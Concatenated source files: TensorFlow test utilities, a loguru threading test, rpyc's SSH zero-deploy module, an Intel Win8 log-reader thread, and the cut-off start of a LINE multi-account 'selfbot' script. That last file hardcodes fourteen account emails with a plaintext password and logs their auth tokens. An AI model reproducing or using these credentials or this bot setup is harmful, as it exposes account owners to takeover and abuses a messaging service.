This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts. `a` and `b` can be namedtuples too,
which are converted to dicts.
Args:
a: The expected numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
|
test_threading.py
|
from threading import Thread
from loguru import logger
import time
def test_safe(capsys):
first_thread_initialized = False
second_thread_initialized = False
entered = False
output = ""
def non_safe_sink(msg):
nonlocal entered
nonlocal output
assert not entered
entered = True
time.sleep(1)
entered = False
output += msg
def first_thread():
nonlocal first_thread_initialized
first_thread_initialized = True
time.sleep(1)
assert second_thread_initialized
logger.debug("message 1")
def second_thread():
nonlocal second_thread_initialized
second_thread_initialized = True
time.sleep(1)
assert first_thread_initialized
time.sleep(0.5)
logger.debug("message 2")
logger.add(non_safe_sink, format="{message}", catch=False)
threads = [Thread(target=first_thread), Thread(target=second_thread)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
out, err = capsys.readouterr()
assert out == err == ""
assert output == "message 1\nmessage 2\n"
|
zerodeploy.py
|
"""
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import rpyc
import socket
from rpyc.core.service import VoidService
try:
from plumbum import local, ProcessExecutionError
from plumbum.utils import copy
except ImportError:
import inspect
if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
# let the sphinx docs be built without requiring plumbum installed
pass
else:
raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
sys.path.insert(0, os.getcwd())
from rpyc.utils.server import $SERVER$ as ServerCls
from rpyc import SlaveService
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True)
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
"""
Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:
1. Create a temporary directory on the remote machine and copy RPyC's code
from the local machine to the remote temporary directory.
2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
allowing only in-bound connections (``localhost`` connections). The server reports the
chosen port over ``stdout``.
3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
machine's chosen port. This tunnel is authenticated and encrypted.
4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
and the temporary directory is deleted.
:param remote_machine: a ``plumbum.SshMachine`` instance, representing an SSH
connection to the desired remote machine
:param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
"""
def __init__(self, remote_machine, server_class = "ThreadedServer"):
self.proc = None
self.tun = None
self._tmpdir_ctx = None
rpyc_root = local.path(rpyc.__file__).dirname
self._tmpdir_ctx = remote_machine.tempdir()
tmp = self._tmpdir_ctx.__enter__()
copy(rpyc_root, tmp)
script = (tmp / "deployed-rpyc.py")
script.write(SERVER_SCRIPT.replace("$SERVER$", server_class))
self.proc = remote_machine.python.popen(script, new_session = True)
line = ""
try:
line = self.proc.stdout.readline()
remote_port = int(line.strip())
except Exception:
try:
self.proc.terminate()
except Exception:
pass
stdout, stderr = self.proc.communicate()
raise ProcessExecutionError(self.proc.argv, self.proc.returncode, line + stdout, stderr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 0))
self.local_port = s.getsockname()[1]
s.close()
self.tun = remote_machine.tunnel(self.local_port, remote_port)
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def close(self):
if self.proc is not None:
try:
self.proc.terminate()
except Exception:
pass
self.proc = None
if self.tun is not None:
self.tun.close()
self.tun = None
if self._tmpdir_ctx is not None:
self._tmpdir_ctx.__exit__(None, None, None)
self._tmpdir_ctx = None
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
return rpyc.classic.connect("localhost", self.local_port)
class MultiServerDeployment(object):
"""
An 'aggregate' server deployment to multiple SSH machine. It deploys RPyC to each machine
separately, but lets you manage them as a single deployment.
"""
def __init__(self, remote_machines, server_class = "ThreadedServer"):
self.remote_machines = remote_machines
# build the list incrementally, so we can clean it up if we have an exception
self.servers = [DeployedServer(mach, server_class) for mach in remote_machines]
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __iter__(self):
return iter(self.servers)
def __len__(self):
return len(self.servers)
def __getitem__(self, index):
return self.servers[index]
def close(self):
while self.servers:
s = self.servers.pop(0)
s.close()
def connect_all(self, service = VoidService, config = {}):
"""connects to all deployed servers; returns a list of connections (order guaranteed)"""
return [s.connect(service, config) for s in self.servers]
def classic_connect_all(self):
"""connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
return [s.classic_connect() for s in self.servers]
|
Win8ReaderThread.py
|
"""
:copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.
The source code contained or described here in and all documents related
to the source code ("Material") are owned by Intel Corporation or its
suppliers or licensors. Title to the Material remains with Intel Corporation
or its suppliers and licensors. The Material contains trade secrets and
proprietary and confidential information of Intel or its suppliers and
licensors.
The Material is protected by worldwide copyright and trade secret laws and
treaty provisions. No part of the Material may be used, copied, reproduced,
modified, published, uploaded, posted, transmitted, distributed, or disclosed
in any way without Intel's prior express written permission.
No license under any patent, copyright, trade secret or other intellectual
property right is granted to or conferred upon you by disclosure or delivery
of the Materials, either expressly, by implication, inducement, estoppel or
otherwise. Any license under such intellectual property rights must be express
and approved by Intel in writing.
:organization: INTEL MCG PSI
:summary: this file implements the win8 logger reader thread
:since: 22/02/2012
:author: rbertolini
"""
import threading
import socket
from Win8WriterThread import Win8WriterThread
class Win8ReaderThread(object):
"""
Class describing the thread used to read logs send by the Win8 DUT.
"""
__SOCKET_TIMEOUT = 5.0
"""
Socket timeout used when reading data from the socket.
"""
def __init__(self, device_ip, port_number):
"""
Constructor of Win8ReaderThread
:type device_ip: string
:param device_ip: Ip address of the targeted device
:type port_number: int
:param port_number: Port where the logger (running on the device) is
listening for connection
"""
# initialization of the variables.
self.__ip_address = device_ip
self.__port = port_number
self.__reader_thread = None
self.__socket = None
self.__thread_alive = threading.Event()
self.__thread_alive.set()
# Creating a Win8WriterThread.
self.__writer_thread = Win8WriterThread()
def start(self):
"""
Starts the Reader and Writer threads.
Connects to the logger.
And then starts listening to the logger.
"""
self.__writer_thread.start()
self.__reader_thread = threading.Thread(target=self.__run)
self.__reader_thread.name = "Win8ReaderThread"
self._connect()
self.__reader_thread.start()
def set_output_path(self, output_path):
"""
Set stdout file path
:type output_path: string
:param output_path: path of the log file to be created
"""
self.__writer_thread.set_output_path(output_path)
return
def stop(self):
"""
Disconnect the thread from the socket of the DUT logger.
"""
try:
self._disconnect()
except Exception as ex: # pylint: disable=W0703
print "Error: %s" % str(ex)
def _connect(self):
"""
Opens the connection with the logger.
"""
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.settimeout(self.__SOCKET_TIMEOUT)
print "Trying to Connect..."
self.__socket.connect((self.__ip_address, self.__port))
print "Connected"
def _disconnect(self):
"""
Closes the connection with the logger.
"""
# close gently the reader thread
if self.__reader_thread.is_alive():
self.__thread_alive.clear()
self.__reader_thread.join(5)
self.__socket.shutdown(socket.SHUT_RDWR)
self.__socket.close()
self.__socket = None
# close gently the writer thread
self.__writer_thread.stop()
def __run(self):
while self.__thread_alive.isSet():
# Read the socket
try:
data = self.__socket.recv(8192)
if data is not None:
self.__writer_thread.push(data)
except socket.timeout:
# no data has been received from the socket
pass
# -----------------------------------------------------------------------------
if __name__ == "__main__":
log_reader = Win8ReaderThread("127.0.0.1", 8003)
log_reader.start()
|
Self.py
|
import KIA
from KIA import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#=============
cl = LineClient("bardiansyah93@gmail.com","sbardian71993")
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
lineProfile = cl.getProfile()
lineSettings = cl.getSettings()
mid = cl.getProfile().mid
responsename1 = cl.getProfile().displayName
ki = LineClient("sbardian7@gmail.com","sbardian71993")
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
lineProfile = ki.getProfile()
lineSettings = ki.getSettings()
Amid = ki.getProfile().mid
responsename2 = ki.getProfile().displayName
kk = LineClient("pekonpelitajaya@gmail.com","sbardian71993")
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
lineProfile = kk.getProfile()
lineSettings = kk.getSettings()
Bmid = ki.getProfile().mid
responsename3 = ki.getProfile().displayName
kc = LineClient("syahbardian3@gmail.com","sbardian71993")
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
lineProfile = kc.getProfile()
lineSettings = kc.getSettings()
Cmid = kc.getProfile().mid
responsename4 = kc.getProfile().displayName
km = LineClient("syahbardian2@gmail.com","sbardian71993")
km.log("Auth Token : " + str(km.authToken))
channel4 = LineChannel(km)
km.log("Channel Access Token : " + str(channel4.channelAccessToken))
lineProfile = km.getProfile()
lineSettings = km.getSettings()
Dmid = km.getProfile().mid
responsename5 = km.getProfile().displayName
kb = LineClient("bardians45@gmail.com","sbardian71993")
kb.log("Auth Token : " + str(kb.authToken))
channel5 = LineChannel(kb)
kb.log("Channel Access Token : " + str(channel5.channelAccessToken))
lineProfile = kb.getProfile()
lineSettings = kb.getSettings()
Emid = kb.getProfile().mid
responsename6 = kb.getProfile().displayName
kn = LineClient("bardiansyah101@gmail.com","sbardian71993")
kn.log("Auth Token : " + str(kn.authToken))
channel6 = LineChannel(kn)
kn.log("Channel Access Token : " + str(channel6.channelAccessToken))
lineProfile = kn.getProfile()
lineSettings = kn.getSettings()
Fmid = kb.getProfile().mid
responsename7 = kn.getProfile().displayName
ko = LineClient("bardiansyah103@gmail.com","sbardian71993")
ko.log("Auth Token : " + str(ko.authToken))
channel7 = LineChannel(ko)
ko.log("Channel Access Token : " + str(channel7.channelAccessToken))
lineProfile = ko.getProfile()
lineSettings = ko.getSettings()
Gmid = ko.getProfile().mid
responsename8 = kb.getProfile().displayName
kw = LineClient("bardiansyah104@gmail.com","sbardian71993")
kw.log("Auth Token : " + str(kw.authToken))
channel8 = LineChannel(kw)
kw.log("Channel Access Token : " + str(channel8.channelAccessToken))
lineProfile = kw.getProfile()
lineSettings = kw.getSettings()
Hmid = kw.getProfile().mid
responsename9 = kw.getProfile().displayName
ke = LineClient("bardiansyah106@gmail.com","sbardian71993")
ke.log("Auth Token : " + str(ke.authToken))
channel9 = LineChannel(ke)
ke.log("Channel Access Token : " + str(channel9.channelAccessToken))
lineProfile = ke.getProfile()
lineSettings = ke.getSettings()
Imid = ke.getProfile().mid
responsename10 = ke.getProfile().displayName
ky = LineClient("bardiansyah107@gmail.com","sbardian71993")
ky.log("Auth Token : " + str(ky.authToken))
channel10 = LineChannel(ky)
ky.log("Channel Access Token : " + str(channel10.channelAccessToken))
lineProfile = ky.getProfile()
lineSettings = ky.getSettings()
Jmid = ky.getProfile().mid
responsename11 = ky.getProfile().displayName
sw = LineClient("tiarazeta94@gmail.com","sbardian71993")
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
lineProfile = sw.getProfile()
lineSettings = sw.getSettings()
Zmid = sw.getProfile().mid
responsename12 = sw.getProfile().displayName
sx = LineClient("famzbot1@gmail.com","sbardian71993")
sx.log("Auth Token : " + str(sx.authToken))
channel12 = LineChannel(sx)
sx.log("Channel Access Token : " + str(channel12.channelAccessToken))
lineProfile = sx.getProfile()
lineSettings = sx.getSettings()
Xmid = sx.getProfile().mid
responsename13 = sx.getProfile().displayName
js = LineClient("famzbot2@gmail.com","sbardian71993")
js.log("Auth Token : " + str(js.authToken))
channel13 = LineChannel(js)
js.log("Channel Access Token : " + str(channel13.channelAccessToken))
lineProfile = js.getProfile()
lineSettings = js.getSettings()
JSmid = js.getProfile().mid
responsename14 = js.getProfile().displayName
print("---LOGIN SUCCES---")
poll = LinePoll(cl)
call = cl
creator = ["u207280ad8ec168e15de1da1246675fd3"]
owner = ["u207280ad8ec168e15de1da1246675fd3"]
admin = ["u207280ad8ec168e15de1da1246675fd3"]
staff = ["u207280ad8ec168e15de1da1246675fd3","ub57eb6366ece293609d3130c80d9838b","u971f78f9fd335ebff75a2f7571b2b3bd","u780dd8a697d1b2c1560e6191d4e6148b","u206e7fe39b8e16080e6982c58f6fe3d2","u5b46014cf8ec3a90236bd209e3dd0de4","ud3907dfe944b2adbcc1c6d4421582ea4","ud88f140c110366a807dfbc9184f14c42"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = km.getProfile().mid
Emid = kb.getProfile().mid
Fmid = kn.getProfile().mid
Gmid = ko.getProfile().mid
Hmid = kw.getProfile().mid
Imid = ke.getProfile().mid
Jmid = ky.getProfile().mid
Zmid = sw.getProfile().mid
Xmid = sx.getProfile().mid
JSmid = js.getProfile().mid
KAC = [cl,ki,kk,kc,km,kb,kn,ko,kw,ke,ky]
ABC = [ki,kk,kc,km,kb,kn,ko,kw,ke,ky]
Bots = [mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Zmid,Xmid,JSmid]
Dpk = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
responsename1 = ki.getProfile().displayName
responsename2 = kk.getProfile().displayName
responsename3 = kc.getProfile().displayName
responsename4 = km.getProfile().displayName
responsename5 = kb.getProfile().displayName
responsename6 = kn.getProfile().displayName
responsename7 = ko.getProfile().displayName
responsename8 = kw.getProfile().displayName
responsename9 = ke.getProfile().displayName
responsename10 = ky.getProfile().displayName
settings = {
"Picture":False,
"group":{},
